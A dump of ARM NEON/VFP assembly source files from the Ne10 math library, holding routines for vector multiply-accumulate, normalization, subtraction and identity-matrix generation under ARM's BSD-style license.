vldr s2, [r7, #4]
vldr s3, [r7, #8]
vldr s4, [r7, #12]
vldr s5, [r3, #0] @ Load cst->x, cst->y, cst->z, and w
vldr s6, [r3, #4]
vldr s7, [r3, #8]
vldr s8, [r3, #12]
vmla.f32 s10, s1, s5 @ s10 = acc[i].x + ( src[i].x * cst->x )
vmla.f32 s11, s2, s6 @ same for 'y'
vmla.f32 s12, s3, s7 @ same for 'z'
vmla.f32 s13, s4, s8 @ same for 'w'
add r8, r0, r5 @ Get current destination item's address in memory
vstr s10, [r8, #0] @ Store the results back into the main memory
vstr s11, [r8, #4]
vstr s12, [r8, #8]
vstr s13, [r8, #12]
add r5, r5, #16 @ increase the offset by 4*sizeof(float) @@ (for x, y, z, and w)
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginVec4F @ Continue if "i < count"
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
pop {r4, r5, r6, r7, r8}
bx lr
|
open-vela/external_Ne10 | 3,591 | modules/math/NE10_mla.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mla.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mla_float_asm
.thumb
.thumb_func
ne10_mla_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mla_float(arm_vec2f_t * dst, arm_float_t * acc,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current src1 entry's address - made of base(r0)+offset
@ r1: *acc & current acc entry's address - made of base(r1)+offset
@ r2: *src1 & current src1 entry's address - made of base(r2)+offset
@ r3: *src2 & current src2 entry's address - made of base(r3)+offset
@ r4: int count
@
@ r4: loop counter
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
ldr r4, [r13, #4] @ r4 = cst ( off the stack pointer (sp) - which is r13 )
cbz r4, .LoopEndFloat
.LoopBeginFloat:
vldr s10, [r1] @ Load s10 = acc[i]
vldr s1, [r2] @ Load s1 = src1[i]
vldr s2, [r3] @ Load s2 = src2[i]
add r1, r1, #4 @ move to the next acc entry
add r2, r2, #4 @ move to the next src1 entry
add r3, r3, #4 @ next entry in src2
vmla.f32 s10, s1, s2 @ s10 = acc[i] + (src1[i] * src2[i])
vstr s10, [r0] @ Store the result back into the main memory
add r0, r0, #4 @ next entry in the dst
subs r4, r4, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
pop {r4}
bx lr
|
open-vela/external_Ne10 | 1,608 | modules/math/NE10_detmat.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_detmat.asm.s
@
|
open-vela/external_Ne10 | 6,714 | modules/math/NE10_normalize.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_normalize.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_normalize_vec2f_asm
.thumb
.thumb_func
ne10_normalize_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * src, unsigned int count)
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec2F
add r0, r0, r2, lsl #3 @ r0 = r0 + count * 8
add r1, r1, r2, lsl #3 @ r1 = r1 + count * 8
.LoopBeginVec2F:
vldmdb r1!, {s10-s11} @ load s10 = x and S11 = y
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vdiv.f32 s10, s10, s15 @ s10 = x / length
vdiv.f32 s11, s11, s15 @ s11 = y / length
vstmdb r0!, {s10-s11} @ store the results and move the pointer
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec2F @ loop if r4 is still positive or zero
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_normalize_vec3f_asm
.thumb
.thumb_func
ne10_normalize_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * src, unsigned int count)
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec3F
add r0, r0, r2, lsl #3 @ ...
add r0, r0, r2, lsl #2 @ r0 = r0 + count * 12
add r1, r1, r2, lsl #3 @ ...
add r1, r1, r2, lsl #2 @ r1 = r1 + count * 12
.LoopBeginVec3F:
vldmdb r1!, {s10-s12}
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vdiv.f32 s10, s10, s15 @ s10 = x / length
vdiv.f32 s11, s11, s15 @ s11 = y / length
vdiv.f32 s12, s12, s15 @ s12 = z / length
vstmdb r0!, {s10-s12} @ store the results and move the pointer
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec3F @ loop if r4 is still positive or zero
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_normalize_vec4f_asm
.thumb
.thumb_func
ne10_normalize_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_normalize_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * src, unsigned int count)
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec4F
add r0, r0, r2, lsl #4 @ r0 = r0 + count * 16
add r1, r1, r2, lsl #4 @ r1 = r1 + count * 16
.LoopBeginVec4F:
vldmdb r1!, {s10-s13}
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vmla.f32 s14, s13, s13 @ s14 = x*x + y*y + z*z + w*w
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vdiv.f32 s10, s10, s15 @ s10 = x / length
vdiv.f32 s11, s11, s15 @ s11 = y / length
vdiv.f32 s12, s12, s15 @ s12 = z / length
vdiv.f32 s13, s13, s15 @ s12 = w / length
vstmdb r0!, {s10-s13} @ store the results and move the pointer
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec4F @ loop if r4 is still positive or zero
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 14,902 | modules/math/NE10_sub.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_sub.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_sub_float_neon
.thumb
.thumb_func
ne10_sub_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_float(arm_float_t * dst,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cbz r3, .L_check_float
@ load the 1st set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q3, q0, q1 @ q3 = q0 - q1
ble .L_mainloopend_float
.L_mainloop_float:
@ store the result for the current set
vst1.32 {d6,d7}, [r0]!
@ load the next set of values
vld1.32 {q0}, [r1]!
vld1.32 {q1}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q3, q0, q1 @ q3 = q0 - q1
bgt .L_mainloop_float @ loop if r3 > 0, if we have at least another 4 floats
.L_mainloopend_float:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {d6,d7}, [r0]!
.L_check_float:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_float
.L_secondloop_float:
@ process the last few items left in the input array
vld1.f32 d0[0], [r1]! @ Fill in d0[0]
vld1.f32 d1[0], [r2]! @ Fill in d1[1]
subs r4, r4, #1
@ values
vsub.f32 d0, d0, d1
vst1.32 {d0[0]}, [r0]!
bgt .L_secondloop_float
.L_return_float:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_sub_vec2f_neon
.thumb
.thumb_func
ne10_sub_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_float(arm_vec2f_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
cbz r3, .L_check_vec2
@ load the 1st set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q8, q0, q2
vsub.f32 q9, q1, q3
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ store the result for the current set
vst2.32 {d16,d17,d18,d19}, [r0]!
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q8, q0, q2
vsub.f32 q9, q1, q3
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ store the result for the last set
vst2.32 {d16,d17,d18,d19}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array
vld1.f32 d0, [r1]!
vld1.f32 d1, [r2]!
subs r4, r4, #1
@ calculate values
vsub.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_sub_vec3f_neon
.thumb
.thumb_func
ne10_sub_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_float(arm_vec3f_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r3 = count % 4;
sub r3, r3, r4 @ count = count - r3; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec3
@ load the 1st set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q12, q0, q9
vsub.f32 q13, q1, q10
vsub.f32 q14, q2, q11
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ store the result for the current set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
@ load the next set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d18, d20, d22}, [r2]!
vld3.32 {d19, d21, d23}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q12, q0, q9
vsub.f32 q13, q1, q10
vsub.f32 q14, q2, q11
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ store the result for the last set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values for
vsub.f32 d0, d0, d1
vsub.f32 d2, d2, d3
vsub.f32 d4, d4, d5
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_sub_vec4f_neon
.thumb
.thumb_func
ne10_sub_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_float(arm_vec4f_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; This is what's left to be processed after this loop
cmp r3, #0
beq .L_check_vec4
@ load the 1st set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
subs r3, r3, #4 @ 4 for this set
@ calculate values for the 1st set
vsub.f32 q12, q0, q8
vsub.f32 q13, q1, q9
vsub.f32 q14, q2, q10
vsub.f32 q15, q3, q11
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ store the result for the current set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
subs r3, r3, #4
@ calculate values for the next set
vsub.f32 q12, q0, q8
vsub.f32 q13, q1, q9
vsub.f32 q14, q2, q10
vsub.f32 q15, q3, q11
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ store the result for the last set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r4, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
vsub.f32 q0, q0, q1
vst1.32 {d0, d1}, [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,573 | modules/math/NE10_identitymat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_identitymat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_identitymat_2x2f_neon
.thumb
.thumb_func
ne10_identitymat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_identitymat_2x2f(arm_mat2x2f_t * dst,
@ arm_mat2x2f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r2: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r2, r1, #3 @ r2 = count % 4;
sub r1, r1, r2 @ count = count - r1; This is what's left to be processed after this loop
vmov.f32 d2, #0.0
vmov.f32 d3, #0.0
vmov.f32 d0, #1.0
vmov.f32 d1, #1.0
vmov q3, q0
vmov q2, q1
cmp r1, #0
beq .L_check_mat2x2
.L_mainloop_mat2x2:
subs r1, r1, #4
vst4.32 {d0, d2, d4, d6}, [r0]!
vst4.32 {d1, d3, d5, d7}, [r0]!
bgt .L_mainloop_mat2x2 @ loop if r1 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r2, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array
vswp d18, d20
subs r2, r2, #1
vst4.32 {d0[0], d2[0], d4[0], d6[0]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return
mov r0, #0
bx lr
.align 2
.global ne10_identitymat_3x3f_neon
.thumb
.thumb_func
ne10_identitymat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_identitymat_3x3f(arm_mat3x3f_t * dst,
@ arm_mat3x3f_t * src1,
@ arm_mat3x3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r2: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r2, r1, #3 @ r1 = count % 4;
sub r1, r1, r2 @ count = count - r1; This is what's left to be processed after this loop
vmov.f32 d2, #0.0
vmov.f32 d3, #0.0
vmov.f32 d0, #1.0
vmov.f32 d1, #1.0
vmov q8 , q1
vmov q9 , q1
vmov q10, q1
vmov q11, q1
vmov q12, q1
vmov q13, q1
vtrn.32 d2, d0 @ d0 = {0.0f, 1.0f}
vtrn.32 d1, d3 @ d1 = {1.0f, 0.0f}
vmov d16, d1
vmov d18, d0
vmov d21, d1
vmov d22, d1
vmov d24, d0
vmov d27, d1
cmp r1, #0
beq .L_check_mat3x3
.L_mainloop_mat3x3:
subs r1, r1, #2
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
vst3.32 { d22 , d24 , d26 }, [r0]!
vst3.32 { d23[0], d25[0], d27[0]}, [r0]!
bgt .L_mainloop_mat3x3 @ loop if r1 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_mat3x3:
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r2, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array
subs r2, r2, #1
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return
mov r0, #0
bx lr
.align 2
.global ne10_identitymat_4x4f_neon
.thumb
.thumb_func
ne10_identitymat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_identitymat_4x4f(arm_mat4x4f_t * dst,
@ arm_mat4x4f_t * src1,
@ arm_mat4x4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r2: the number of items that are left to be processed at the end
@ of the input array
